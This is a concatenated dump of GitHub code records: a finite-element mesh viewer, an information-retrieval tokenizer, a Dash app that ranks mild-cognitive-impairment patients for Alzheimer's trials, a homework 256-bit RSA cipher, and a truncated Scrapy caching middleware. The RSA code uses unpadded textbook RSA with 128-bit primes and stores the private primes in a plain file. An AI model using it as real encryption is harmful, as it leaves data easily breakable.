eu_ind)\n\t\t\t\tu_ind.append(e2p(eu_ind)[0,:])\n\n\t\t\tself.mesh = Mesh(read_in = True)\n\t\t\tself.mesh.init_from_file(V=e2p(eV), \n\t\t\t\t\t\t\t\tT=e2p(eT), \n\t\t\t\t\t\t\t\tu=e2p(eu), \n\t\t\t\t\t\t\t\tQ=e2p(eQ), \n\t\t\t\t\t\t\t\tfix=e2p(efix), \n\t\t\t\t\t\t\t\tmov=e2p(emov), \n\t\t\t\t\t\t\t\tr_element_cluster_map=e2p(er_ind), \n\t\t\t\t\t\t\t\ts_handles_ind=e2p(es_ind), \n\t\t\t\t\t\t\t\tu_clusters_element_map= u_ind,\n\t\t\t\t\t\t\t\tmodes_used=modes_used)\n\n\t\t\tprint(\"Done reading DMAT\")\n\n\tdef createMesh(self, modes=None, muscle=True):\n\t\tto_fix = self.Fix\n\t\tto_mov = self.Mov\n\n\t\tself.mesh = Mesh([self.V, self.T, self.U], ito_fix = to_fix, ito_mov=to_mov, read_in= False, modes_used=modes)\n\t\tself.mesh.u, self.uvec, self.eGu, self.UVECS = heat_method(self.mesh)\n\t\tself.mesh.getGlobalF(updateR=False, updateS=False, updateU=True)\n\t\tCAg = self.mesh.getC().dot(self.mesh.getA().dot(self.mesh.x0))\n\t\t# self.uClusters = [[t for t in range(len(self.T)) if CAg[6*t]<=0.1],\n\t\t# \t\t\t\t\t[t for t in range(len(self.T)) if CAg[6*t]>=0.9]]\n\n\t\tself.mesh.u_clusters_element_map = [np.array(list(e), dtype=\"int32\") for e in self.uClusters]\n\n\tdef getMesh(self, name=None, modes_used=None, muscle=True):\n\t\tif name is not None:\n\t\t\tself.read_mesh_setup(name = name, modes_used=modes_used)\n\t\telse:\n\t\t\tself.createMesh(modes=modes_used)\n\t\treturn self.mesh\n\n\tdef display(self):\n\t\tred = igl.eigen.MatrixXd([[1,0,0]])\n\t\tpurple = igl.eigen.MatrixXd([[1,0,1]])\n\t\tgreen = igl.eigen.MatrixXd([[0,1,0]])\n\t\tblack = igl.eigen.MatrixXd([[0,0,0]])\n\t\tblue = igl.eigen.MatrixXd([[0,0,1]])\n\t\twhite = igl.eigen.MatrixXd([[1,1,1]])\n\n\t\trandc = [[random.uniform(0,1), random.uniform(0,1), random.uniform(0,1)] for i in range(10)]\n\n\t\tviewer = igl.glfw.Viewer()\n\t\tdef mouse_up(viewer, btn, bbb):\n\t\t\tif btn==1:\n\t\t\t\tself.middle_button_down = False\n\n\n\t\tdef mouse_down(viewer, btn, bbb):\n\t\t\t# Cast a ray in the view direction starting from the mouse position\n\t\t\tbc = igl.eigen.MatrixXd()\n\t\t\tfid = igl.eigen.MatrixXi(np.array([-1]))\n\t\t\tcoord = igl.eigen.MatrixXd([viewer.current_mouse_x, viewer.core.viewport[3] - viewer.current_mouse_y])\n\t\t\thit = igl.unproject_onto_mesh(coord, viewer.core.view * viewer.core.model,\n\t\t\tviewer.core.proj, viewer.core.viewport, igl.eigen.MatrixXd(self.V), igl.eigen.MatrixXi(self.T), fid, bc)\n\t\t\tind = e2p(fid)[0][0]\n\n\t\t\tif hit and btn==0:\n\t\t\t\t# paint hit red\n\t\t\t\tself.Fix.append(self.T[ind][np.argmax(bc)])\n\t\t\t\tprint(\"fix\",self.T[ind][np.argmax(bc)])\n\t\t\t\treturn True\n\t\t\t\n\t\t\tif hit and btn==2:\n\t\t\t\t# paint hit red\n\t\t\t\tself.Mov.append(self.T[ind][np.argmax(bc)])\n\t\t\t\tprint(\"mov\",self.T[ind][np.argmax(bc)])\n\t\t\t\treturn True\n\n\t\t\tif hit and btn==1:\n\t\t\t\tself.middle_button_down = True\n\t\t\t\tself.uClusters.append(set())\n\t\t\t\tself.uClusterNum += 1\n\t\t\t\treturn True\n\t\t\t\n\t\t\treturn False\n\n\t\tdef mouse_move(viewer, mx, my):\n\t\t\tif self.middle_button_down:\n\t\t\t\t# Cast a ray in the view direction starting from the mouse position\n\t\t\t\tbc = igl.eigen.MatrixXd()\n\t\t\t\tfid = igl.eigen.MatrixXi(np.array([-1]))\n\t\t\t\tcoord = igl.eigen.MatrixXd([viewer.current_mouse_x, viewer.core.viewport[3] - viewer.current_mouse_y])\n\t\t\t\thit = igl.unproject_onto_mesh(coord, viewer.core.view * viewer.core.model,\n\t\t\t\tviewer.core.proj, viewer.core.viewport, igl.eigen.MatrixXd(self.V), igl.eigen.MatrixXi(self.T), fid, bc)\n\t\t\t\tind = e2p(fid)[0][0]\n\t\t\t\tself.uClusters[self.uClusterNum].add(ind)\n\t\t\t\treturn True\n\n\n\t\tdef key_down(viewer,aaa, bbb):\n\t\t\tif(aaa == 65):\n\t\t\t\tself.createMesh(modes=self.modes_used)\n\t\t\tif(aaa == 83):\n\t\t\t\tself.save_mesh_setup(name=\"test2x2\")\n\n\t\t\tviewer.data().clear()\n\t\t\tif self.uvec is None:\n\t\t\t\tnV = self.V#np.concatenate((self.V, np.zeros((len(self.V),1))), axis =1)\n\t\t\telse:\n\t\t\t\t#3d Heat Gradient\n\t\t\t\tnV = self.V#np.concatenate((self.V, np.zeros((len(self.V),1))), axis =1)\n\t\t\t\t# print(self.mesh.V.shape, self.uvec.shape)\n\t\t\t\t# nV = np.concatenate((self.mesh.V, self.uvec[:,np.newaxis]), axis=1)\n\t\t\t\t# BC = igl.eigen.MatrixXd()\n\t\t\t\t# igl.barycenter(igl.eigen.MatrixXd(nV), igl.eigen.MatrixXi(self.T), BC)\n\t\t\t\t# GU_mag = self.eGu.rowwiseNorm()\n\t\t\t\t# max_size = igl.avg_edge_length(igl.eigen.MatrixXd(nV), igl.eigen.MatrixXi(self.T)) / GU_mag.mean()\n\t\t\t\t# viewer.data().add_edges(BC, BC + max_size*self.eGu, black)\n\t\n\t\t\tviewer.data().set_mesh(igl.eigen.MatrixXd(nV), igl.eigen.MatrixXi(self.T))\n\n\t\t\tif self.mesh is not None:\n\t\t\t\tColors = np.ones(self.mesh.T.shape)\n\t\t\t\tif (aaa==82):\n\t\t\t\t\tfor i in range(len(self.mesh.T)): \n\t\t\t\t\t\tcolor = black\n\t\t\t\t\t\tColors[i,:] = randc[self.mesh.r_element_cluster_map[i]]\n\t\t\t\telif(aaa==67):\n\t\t\t\t\tfor i in range(len(self.mesh.u_clusters_element_map)):\n\t\t\t\t\t\tfor j in range(len(self.mesh.u_clusters_element_map[i])):\n\t\t\t\t\t\t\tk = self.mesh.u_clusters_element_map[i][j]\n\t\t\t\t\t\t\tColors[k,:] = randc[i]\n\t\t\t\tColors[np.array([self.mesh.s_handles_ind]),:] = np.array([0,0,0])\n\t\t\t\tviewer.data().set_colors(igl.eigen.MatrixXd(np.array(Colors)))\n\n\t\t\tif not self.mesh is None:\n\t\t\t\tCAg = self.mesh.getC().dot(self.mesh.getA().dot(self.mesh.x0))\n\t\t\t\tprint(self.mesh.u)\n\t\t\t\tfor i in range(len(self.T)):\n\t\t\t\t\tC = np.matrix([CAg[6*i:6*i+2],CAg[6*i:6*i+2]])\n\t\t\t\t\tU = np.multiply(self.mesh.getU(i), np.array([[0.25],[0.25]])) + C\n\t\t\t\t\tviewer.data().add_edges(igl.eigen.MatrixXd(C[0,:]), igl.eigen.MatrixXd(U[0,:]), black)\n\n\t\tdef pre_draw(viewer):\n\t\t\tfixed_pts = []\n\t\t\tfor i in range(len(self.Fix)):\n\t\t\t\tfixed_pts.append(self.V[self.Fix[i]])\n\t\t\tviewer.data().add_points(igl.eigen.MatrixXd(np.array(fixed_pts)), red)\n\n\t\t\tmov_pts = []\n\t\t\tfor i in range(len(self.Mov)):\n\t\t\t\tmov_pts.append(self.V[self.Mov[i]])\n\t\t\tviewer.data().add_points(igl.eigen.MatrixXd(np.array(mov_pts)), green)\n\t\t\t\n\t\t\t# viewer.data().add_points(igl.eigen.MatrixXd(np.array(shit)), purple)\n\n\t\tkey_down(viewer, \"b\", 123)\n\t\tviewer.callback_mouse_down = mouse_down\n\t\tviewer.callback_key_down = key_down\n\t\tviewer.callback_mouse_up = mouse_up\n\t\tviewer.callback_mouse_move = mouse_move\n\t\tviewer.callback_pre_draw = pre_draw\n\t\tviewer.core.is_animating = False\n\t\tviewer.launch()\n\n\n","repo_name":"itsvismay/ElasticFEM","sub_path":"Scripts/Meshwork.py","file_name":"Meshwork.py","file_ext":"py","file_size_in_byte":10005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16992975104","text":"import re\r\nfrom nltk.corpus import stopwords\r\nimport gensim.downloader as api\r\nfrom collections import Counter\r\n\r\nmodel = api.load(\"glove-wiki-gigaword-50\")\r\n\r\n\r\nenglish_stopwords = frozenset(stopwords.words('english'))\r\nRE_WORD = re.compile(r\"\"\"[\\#\\@\\w](['\\-]?\\w){2,24}\"\"\", re.UNICODE)\r\ncorpus_stopwords = [\"category\", \"references\", \"also\", \"external\", \"links\",\r\n \"may\", \"first\", \"see\", \"history\", \"people\", \"one\", \"two\",\r\n \"part\", \"thumb\", \"including\", \"second\", \"following\",\r\n \"many\", \"however\", \"would\", \"became\"]\r\nour = [\"why\",\"how\",\"what\",\"make\"]\r\nall_stopwords = english_stopwords.union(corpus_stopwords)\r\nour_stopwords = all_stopwords.union(our)\r\n\r\n\r\n# from hw1\r\ndef get_html_pattern():\r\n return \"(\\<[^\\<]+\\>)\"\r\n\r\ndef get_date_pattern():\r\n m_31_days = 'January|Jan|March|Mar|May|July|Jul|August|Aug|October|Oct|December|Dec'\r\n d_31_days = '([1-9]|3[10]|[12]\\d)'\r\n m_30_days = 'April|Apr|June|Jun|September|Sep|November|Nov'\r\n d_30_days = '([1-9]|30|[12]\\d)'\r\n m_29_days = 'February|Feb'\r\n d_29_days = '([1-9]|[12]\\d)'\r\n year = '\\d*'\r\n return f\"(?i)(({m_31_days})\\s{d_31_days}\\,\\s{year})|({d_31_days}\\s({m_31_days})\\s{year})|(({m_30_days})\\s{d_30_days}\\,\\s{year})|({d_30_days}\\s({m_30_days})\\s{year})|(({m_29_days})\\s{d_29_days}\\,\\s{year})|({d_29_days}\\s({m_29_days})\\s{year})\"\r\ndef get_time_pattern():\r\n secmin = '([0-5]\\d)'\r\n hours = '([0-1]\\d)'\r\n no_chars = '(?![A-Za-z0-9])'\r\n no_chars_start = '(?<![A-Za-z0-9])'\r\n return f\"({hours}[\\.]{secmin}(AM|PM){no_chars})|({hours}{secmin}(p\\.m\\.|a\\.m\\.){no_chars})|{no_chars_start}([1-9]\\:{secmin}\\:{secmin}){no_chars}|{no_chars_start}(([1]\\d)\\:{secmin}\\:{secmin}){no_chars}|{no_chars_start}(([2][0-3])\\:{secmin}\\:{secmin}){no_chars}\"\r\n\r\ndef get_percent_pattern():\r\n return \"(?:(?<=\\s|\\())[\\+\\-]?\\d{1,3}(,\\d{3})*(\\.\\d+)?[%](?=(|\\,|\\.|\\:)?(\\s|$))\"\r\n\r\ndef get_number_pattern():\r\n return \"(?:(?<=\\s|\\())[\\+\\-]?\\d{1,3}(,\\d{3})*(\\.\\d+)?(?=(|\\,|\\.|\\:)?(\\s|$))|^\\d+(?=\\s)\"\r\n\r\ndef get_word_pattern():\r\n return \"(?:(?<=\\s)|(?<=^))(([a-zA-Z]+[\\']*[a-zA-Z]*)+\\-*)*([a-zA-Z]+[\\']*[a-zA-Z]*)?\"\r\n\r\nRE_TOKENIZE = re.compile(rf\"\"\"\r\n(\r\n # parsing html tags\r\n (?P<HTMLTAG>{get_html_pattern()}) \r\n # dates\r\n |(?P<DATE>{get_date_pattern()})\r\n # time\r\n |(?P<TIME>{get_time_pattern()})\r\n # Percents\r\n |(?P<PERCENT>{get_percent_pattern()})\r\n # Words\r\n |(?P<WORD>{get_word_pattern()})\r\n # space\r\n |(?P<SPACE>[\\s\\t\\n]+) \r\n # everything else\r\n |(?P<OTHER>.))\"\"\", re.MULTILINE | re.IGNORECASE | re.VERBOSE | re.UNICODE)\r\n\r\n\r\ndef tokenize(text):\r\n \"\"\"\r\n This function aims in tokenize a text into a list of tokens. Moreover, it filter stopwords based on our stop words list.\r\n Parameters:\r\n -----------\r\n text: string , represting the text to tokenize.\r\n Returns:\r\n -----------\r\n list of tokens (e.g., list of tokens).\r\n \"\"\"\r\n tokens = [token.group() for token in RE_WORD.finditer(text.lower())]\r\n return [token for token in tokens if token not in our_stopwords]\r\n\r\ndef query_extension(query):\r\n \"\"\"\r\n This function extend the given query using glove model (adding similar words to the query)\r\n Parameters:\r\n -----------\r\n text: string , represting the text to tokenize.\r\n Returns:\r\n -----------\r\n extended list of tokens (e.g., list of tokens).\r\n \"\"\"\r\n\r\n extend_query = []\r\n for token in query:\r\n try:\r\n to_add = []\r\n similar = model.most_similar(token)\r\n if len(similar) >= 1:\r\n to_add.append(similar[0][0])\r\n if len(similar) > 1:\r\n to_add.append(similar[1][0])\r\n except:\r\n continue\r\n extend_query.extend(to_add)\r\n return query + extend_query\r\n\r\n\r\ndef hw3_tokenize(text):\r\n \"\"\"\r\n This function aims in tokenize a text into a list of tokens. Moreover, it filter stopwords.\r\n Parameters:\r\n -----------\r\n text: string , represting the text to tokenize.\r\n Returns:\r\n -----------\r\n list of tokens (e.g., list of tokens).\r\n \"\"\"\r\n tokens = [token.group() for token in RE_WORD.finditer(text.lower())]\r\n tokens_no_stop = [token for token in tokens if token not in all_stopwords]\r\n return tokens_no_stop\r\n","repo_name":"noaradin1/Information-Retreival-Project","sub_path":"query_preprocess.py","file_name":"query_preprocess.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28879401922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 23 11:25:47 2020\n\n@author: viceva\n\"\"\"\nimport base64\nimport io\nfrom urllib.parse import quote\n\nimport dash\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nimport plotly.express as px\nimport pandas as pd\nfrom src.predict_model import feat_selection, predict_AD, feature_check, which_tests,predict_survival\n\ndff = pd.read_csv('data/raw/dummy.csv')\ncsv_string = dff.to_csv(encoding='utf-8', index=False)\ncsv_string = \"data:text/csv;charset=utf-8,\" + quote(csv_string)\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets, suppress_callback_exceptions=True, prevent_initial_callbacks=True)\n\nserver = app.server\n\napp.layout = html.Div(children=[\n html.H1(children='Target AD',style = {'width': '100%', 'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),\n html.Div(children='''\n A batch screening tool to focus early clinical trials of Alzheimer's Disease. This tool predicts which mild cognitive impaired patients are most likely to develop Alzheimer's\n ''',style = {'width': '100%', 'display': 'flex', 'align-items': 'center', 'justify-content': 'center', 'padding': 10}),\n html.P(['1) Download the template below to structure your data. The template contains dummy values for you to replace, test names should not be changed. If you are unfamiliar with the test name, use the Variable Lookup search.', html.Br()], style = {'width': '80%', 'align-items': 'center', 'justify-content': 'center','margin': '20px','margin-left': '135px' ,'display': 'flex'}),\n html.A(\n 'Download Template',\n id='download-link',\n download=\"template.csv\",\n href=csv_string,\n target=\"_blank\"\n , style = {'width': '100%', 'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),\n \n dcc.Upload(\n id='upload-data',\n children=html.Div([\n '2) Upload your .csv or .xlm patient file: Drag and Drop or ',\n html.A('Select Files'),'. After dropping your file, a table and chart with results will be displayed'\n ]),\n style={\n 'width': '80%',\n 'align-items': 'center', 'justify-content': 'center',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '20px' ,\n 'margin-left': '135px',\n },\n # Allow multiple files to be uploaded\n multiple=False\n ),\n \n \n html.Div([html.Div('''3) OPTIONAL. Select model threshold. Lower values will include more patients into the pool, but increases false negatives. Default value is optimized for tradeoff.'''),\n dcc.Slider(\n id='Model precision',\n min=0.25,\n max=.75,\n step=.001,\n value=.5,\n marks={\n .25: '.25',\n .35: '.35',\n .45: '.45',\n .55: '.55',\n .65: '.65',\n .75: '.75',\n\n },\n tooltip = { 'always_visible': False, 'placement':'bottom' }\n ),\n \n html.Div(id='slider-output-container'),\n ],style={'marginBottom': 50,'marginTop': 50,'width': '80%', 'margin-left': '135px'}),\n \n html.Div([html.Div('''4) Select time from first visit in days. It will update the likelihood (ranging form 0-not very likely to 1-very likely) for a patient to be diagnosed with Alzheimer's by this timepoint.'''),\n dcc.Slider(\n id='Time point',\n min=150,\n max=550,\n step=10,\n value=365,\n marks={\n 150: '150',\n 250: '250',\n 350: '350',\n 450: '450',\n 550: '550',\n },\n tooltip = { 'always_visible': False, 'placement':'bottom' }\n ),\n \n html.Div(id='slider-output-container2'),\n ],style={'marginBottom': 50,'marginTop': 50, 'width': '80%', 'margin-left': '135px'}),\n \n \n html.Div(id='output-data-upload',\n style = {'width': '100%', 'align-items': 'center', 'justify-content': 'center', 'margin-left': '205px'}), \n \n \n html.Div([\n html.I([\"Variable Lookup:\",html.Br(), \"Input the name of the variable you want more information about.A description and accepted values for this test will be displayed\"]),\n html.Br(),\n dcc.Input(id=\"input1\", type=\"text\", placeholder=\"\", debounce=True),\n\n html.Div(id=\"output\", style = {'width': '100%', 'margin': '5px', 'margin-left': '185px'}),\n ] , style = {'width': '100%', 'align-items': 'center', 'justify-content': 'center','textAlign': 'center'}, className=\"one column\"),\n \n\n \n # Hidden div inside the app that stores the intermediate value\n html.Div(id='intermediate-value', style={'display': 'none'}),\n \n])\n \n@app.callback(\n Output(\"output\", \"children\"),\n [Input(\"input1\", \"value\")],\n)\ndef update_output(input1):\n if input1:\n dd= pd.read_csv('docs/rdd_datadictionary_uds.csv')\n answer=dd[['ShortDescriptor','AllowableCodes']].loc[dd.VariableName==input1]\n \n search_table = html.Div()\n search_table = html.Div([\n dash_table.DataTable(\n data=answer.to_dict('records'),\n columns=[{'name': i, 'id': i} for i in answer.columns],\n style_cell={\n 'whiteSpace': 'normal',\n 'height': 'auto',\n 'maxWidth': 40,\n \n },\n style_table={\n 'width': 800\n },\n ),\n #html.Hr()\n ])\n return search_table \n\ndef parse_contents(contents, filename, date):\n content_type, content_string = contents.split(',')\n\n decoded = base64.b64decode(content_string)\n try:\n if 'csv' in filename:\n # Assume that the user uploaded a CSV or TXT file\n df = pd.read_csv(\n io.StringIO(decoded.decode('utf-8')))\n elif 'xls' in filename:\n # Assume that the user uploaded an excel file\n df = pd.read_excel(io.BytesIO(decoded))\n elif 'txt' or 'tsv' in filename:\n # Assume that the user upl, delimiter = r'\\s+'oaded an excel file\n df = pd.read_csv(\n io.StringIO(decoded.decode('utf-8')), delimiter = r'\\s+')\n except Exception as e:\n print(e)\n return html.Div([\n 'There was an error processing this file.'\n ])\n\n return df \n\n\n\n@app.callback(Output('intermediate-value', 'children'), \n [Input('upload-data', 'contents')],\n [State('upload-data', 'filename'),\n State('upload-data', 'last_modified')])\n\ndef clean_data(contents, filename,date):\n if contents:\n df = parse_contents(contents, filename, date)\n return df.to_json(orient='split')\n\n\n@app.callback(Output('output-data-upload', 'children'),\n [Input('intermediate-value', 'children'),\n Input('Model precision', 'value'),\n Input('Time point', 'value')]) \n\ndef update_table(jsonified_data, slider_value, time_value):\n \n if jsonified_data:\n table = html.Div()\n \n dff = pd.read_json(jsonified_data, orient='split')\n df_subset=feat_selection(dff, 'models/01final_features_res.sav')\n tests_df, model_df=feature_check(df_subset)\n predictions=predict_AD(model_df, 'models/rf_best.sav', slider_value)\n surv_df=predict_survival(model_df, 'models/surv_model.sav', threshold=time_value)\n \n merged_ps=predictions.join(surv_df.set_index('Patient ID'), on='Patient ID')\n merged_ps.loc[merged_ps['Include'] =='No', 'Likely diagnosis'] = 'Not applicable'\n \n needed_tests=which_tests(tests_df)\n merged_table=pd.concat([merged_ps,needed_tests])\n merged_table=merged_table.fillna('All completed')\n \n figure=px.bar(merged_table[['Patient ID', 'Include' ]].groupby('Include').count(),color_discrete_sequence=px.colors.qualitative.Pastel2)\n figure.update_layout(showlegend=False)\n \n table = html.Div([html.P('Note: Patients hihlighted in green can be selected for the clinical trial. If Orange, the tests indicated need to be performed before a prediction can be given. The table can be sorted, filtered, modified and downloaded. The distribution is shown in the graph', style = {'width': '70%'}),\n \n html.Div([dash_table.DataTable(\n data=merged_table.to_dict('records'),\n columns=[{'name': i, 'id': i} for i in merged_table.columns],\n editable=True,\n id='data-table',\n style_data_conditional=[\n {\n 'if': {\n 'filter_query': '{Include} = Yes', \n },\n 'backgroundColor': 'rgb(179,226,205)', \n },\n {\n 'if': {\n 'filter_query': '{Include} = `Tests needed`', \n },\n 'backgroundColor': 'rgb(253,205,172)', \n }],\n \n style_table={\n 'height': 400,\n #'overflowY': 'scroll',\n 'width': 400\n },\n style_cell={\n 'whiteSpace': 'normal',\n 'height': 'auto',\n 'minWidth': 80,\n 'textAlign': 'left'\n\n },\n style_filter = {'height':'25px'}, \n filter_action=\"native\",\n fixed_rows={'headers': True},\n sort_action=\"native\",\n page_action='native',\n sort_mode=\"multi\",\n export_columns='all',\n export_format='csv',\n export_headers ='names',\n ),\n \n \n ], className=\"four columns\"),\n \n\n html.Div([dcc.Graph(id='example-graph',\n figure=figure),\n ], className=\"five columns\")\n \n ], style={ 'margin-bottom':'55px'})\n return table\n\n\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)","repo_name":"vicvarE/AD-Dash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33851713511","text":"#####################################\n# 256 Bit RSA Cipher by Vikram Manja\n#####################################\n\nfrom BitVector import *\nimport sys\nimport random\n\nimport random\n\n############################ class PrimeGenerator by Avi Kak ##############################\nclass PrimeGenerator( object ): #(A1)\n\n def __init__( self, **kwargs ): #(A2)\n bits = debug = None #(A3)\n if 'bits' in kwargs : bits = kwargs.pop('bits') #(A4)\n if 'debug' in kwargs : debug = kwargs.pop('debug') #(A5)\n self.bits = bits #(A6)\n self.debug = debug #(A7)\n self._largest = (1 << bits) - 1 #(A8)\n\n def set_initial_candidate(self): #(B1)\n candidate = random.getrandbits( self.bits ) #(B2)\n if candidate & 1 == 0: candidate += 1 #(B3)\n candidate |= (1 << self.bits-1) #(B4)\n candidate |= (2 << self.bits-3) #(B5)\n self.candidate = candidate #(B6)\n\n def set_probes(self): #(C1)\n self.probes = [2,3,5,7,11,13,17] #(C2)\n\n # This is the same primality testing function as shown earlier\n # in Section 11.5.6 of Lecture 11:\n def test_candidate_for_prime(self): #(D1)\n 'returns the probability if candidate is prime with high probability'\n p = self.candidate #(D2)\n if p == 1: return 0 #(D3)\n if p in self.probes: #(D4)\n self.probability_of_prime = 1 #(D5)\n return 1 #(D6)\n if any([p % a == 0 for a in self.probes]): return 0 #(D7)\n k, q = 0, self.candidate-1 #(D8)\n while not q&1: #(D9)\n q >>= 1 #(D10)\n k += 1 #(D11)\n if self.debug: print(\"q = %d k = %d\" % (q,k)) #(D12)\n for a in self.probes: #(D13)\n a_raised_to_q = pow(a, q, p) #(D14)\n if a_raised_to_q == 1 or a_raised_to_q == p-1: continue #(D15)\n a_raised_to_jq = a_raised_to_q #(D16)\n primeflag = 0 #(D17)\n for j in range(k-1): #(D18)\n a_raised_to_jq = pow(a_raised_to_jq, 2, p) #(D19)\n if a_raised_to_jq == p-1: #(D20)\n primeflag = 1 #(D21)\n break #(D22)\n if not primeflag: return 0 #(D23)\n self.probability_of_prime = 1 - 1.0/(4 ** len(self.probes)) #(D24)\n return self.probability_of_prime #(D25)\n\n def findPrime(self): #(E1)\n self.set_initial_candidate() #(E2)\n if self.debug: print(\" candidate is: %d\" % self.candidate) #(E3)\n self.set_probes() #(E4)\n if self.debug: print(\" The probes are: %s\" % str(self.probes)) #(E5)\n max_reached = 0 #(E6)\n while 1: #(E7)\n if self.test_candidate_for_prime(): #(E8)\n if self.debug: #(E9)\n print(\"Prime number: %d with probability %f\\n\" %\n (self.candidate, self.probability_of_prime) ) #(E10)\n break #(E11)\n else: #(E12)\n if max_reached: #(E13)\n self.candidate -= 2 #(E14)\n elif self.candidate >= self._largest - 2: #(E15)\n max_reached = 1 #(E16)\n self.candidate -= 2 #(E17)\n else: #(E18)\n self.candidate += 2 #(E19)\n if self.debug: #(E20)\n print(\" candidate is: %d\" % self.candidate) #(E21)\n return self.candidate #(E22)\n\n##############################################################################\n\ne = 65537\n\ndef chinese_remainder_theorem(c, d, p, q):\n \"\"\"\n Returns c^d mod (p*q) using chinese remainders\n \"\"\"\n vp = gme(int(c), int(d), p)\n vq = gme(int(c), int(d), q)\n xp = q * int(BitVector(intVal=q, size=128).multiplicative_inverse(BitVector(intVal=p)))\n xq = p * int(BitVector(intVal=p, size=128).multiplicative_inverse(BitVector(intVal=q)))\n\n return (vp*xp + vq*xq) % (p*q)\n\ndef coprime(a,b):\n if (b < a): a,b = b,a\n while b:\n a, b = b, a % b\n if (a==1):return True\n else: return False\n\ndef get_two_primes():\n generator = PrimeGenerator(bits=128)\n p = generator.findPrime()\n q = generator.findPrime()\n # check not equal\n if (p==q): return get_two_primes()\n # check coprime\n if not coprime(p-1,e): return get_two_primes()\n if not coprime(q-1,e): return get_two_primes()\n return p,q\n\ndef gme(a,b,n):\n \"\"\"\n General Modular Exponentiation\n Returns a^b mod n\n \"\"\"\n result = 1\n while b > 0:\n if b & 1:\n result = (result * a) % n\n b = b >> 1\n a = (a * a) % n\n return int(result)\n\ndef encrypt(message_file, output_file):\n output = open(output_file, \"w\")\n p,q = get_two_primes()\n # SAVE p and q\n with open(\"pq.txt\", \"w\") as pq:\n for i in [p, \" \", q]: pq.write(str(i))\n n = p * q\n bv = BitVector(filename=message_file)\n while bv.more_to_read:\n # Read 128 bits\n bv_out = bv.read_bits_from_file(128)\n # Right pad with newlines (ascii=10)\n while(len(bv_out) < 128):\n bv_out += BitVector(intVal=10, size=8)\n # m^e mod n (e is small so 'gme' suffices --> gme is equivalent to 'pow')\n bv_out = BitVector(intVal=gme(int(bv_out), e, n))\n # Left pad with 0s\n if (len(bv_out)) < 256:\n bv_out = BitVector(size=256-len(bv_out)) + bv_out\n # Write crypt text\n output.write(bv_out.get_bitvector_in_hex())\n output.close()\n\ndef decrypt(encrypted_file, decrypted_file):\n dec = open(decrypted_file, \"w\")\n # GET p and q\n p,q = (int(i) for i in open(\"pq.txt\", \"r\").read().split())\n totient = (p-1) * (q-1)\n d = BitVector(intVal=e).multiplicative_inverse(BitVector(intVal=totient))\n bv = BitVector(filename=encrypted_file)\n while bv.more_to_read:\n # Read & Translate Bitvector from hexstring\n bv_out = bv.read_bits_from_file(512)\n bv_out = BitVector(hexstring=bv_out.get_bitvector_in_ascii())\n # Use Chinese Remainder Theorem to get C^d\n bv_out = BitVector(intVal=chinese_remainder_theorem(bv_out, d, p, q),size=256)\n # Remove '0' padding\n bv_out = bv_out[128:]\n # Write Plain Text\n dec.write(bv_out.get_bitvector_in_ascii())\n dec.close()\n\nif __name__ == \"__main__\":\n if(len(sys.argv) < 4):\n print(\"Error: requires 3 inputs\")\n sys.exit()\n if(sys.argv[1] == \"-e\"):\n encrypt(sys.argv[2], sys.argv[3])\n if(sys.argv[1] == \"-d\"):\n decrypt(sys.argv[2], sys.argv[3])\n\n# Example:\n# pq.txt = 272521153320973396417630511022295649383 333191769576802382347215159520488131299\n# d = 21192676109789010391262862485922983581960781531678874582696409324652745084161\n# output.txt = 8dd329d0374a924f4a0ae76371f41cfa07e68c4a087f4c0ff29d41ddb25ae4d230c10225c3745a007708f1958a2ffaef2b39bf106203c8eca790cf5d609ddefa3e6b97da17c9267b996d26bab106cbc9915e4edb2453715424e9ff7d3b26902b2366d0b1b90df6a07f1bac51674fcfac24724aae765ff6681def9ae837217b1e08f30b1eefa7afdb82eb152e0252fc5ab6dfa47578aba3484e1cf5af5bb4ef6caceaf11993fb1b60325114cbef63ba8e11d604dda57e73f48cb85f7f564b452b1a098dc616d60f38c4edd94f90aa637aa57d0eb7049e83ddbba2f066f414378cc0854649028db78fb5a4b8308e52a37671dc61a8c42de24f94ee878f01056c3db63ba3ba9b22a3abd74e644119bea59c487dd825dfabfdfa0ae9ab1682d802d1464f5a807df29f3d7b5ee9089ba8b20a6b7e306eb6038eb44aee36b8e1337a73bbfed649a2665ec3ed6066e0805ced5a09eb575528f06f1f8bc5001bb4fe1cc1c03d1e4d3ab45abf40f02f158da7ca71e17411b2863c9fb8f53ba0ce0ef23936\n# decrypted.txt = Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more. It is a tale told by an idiot, full of sound and fury, signifying nothing.\n\n\n# decrypted_hex: 4c69666527732062757420612077616c6b696e6720736861646f772c206120706f6f7220706c6179657220746861742073747275747320616e642066726574732068697320686f75722075706f6e2074686520737461676520616e64207468656e206973206865617264206e6f206d6f72652e20497420697320612074616c6520746f6c6420627920616e206964696f742c2066756c6c206f6620736f756e6420616e6420667572792c207369676e696679696e67206e6f7468696e672e0a0a\n# (0a = newline added from padding)\n","repo_name":"vmanja16/Security","sub_path":"RSA/rsa_manja.py","file_name":"rsa_manja.py","file_ext":"py","file_size_in_byte":10497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35785619070","text":"from scrapy.http import HtmlResponse\nfrom scrapy.exceptions import IgnoreRequest\n\nclass HttpStatusMiddleware(object):\n\n @classmethod\n def process_response(self,request,response,spider):\n http_status = response.status\n url = request.url\n html_file = open('cache/' + url.replace('/','+').replace(':','+'),'a')\n html_file.write(response.body)\n html_file.flush()\n 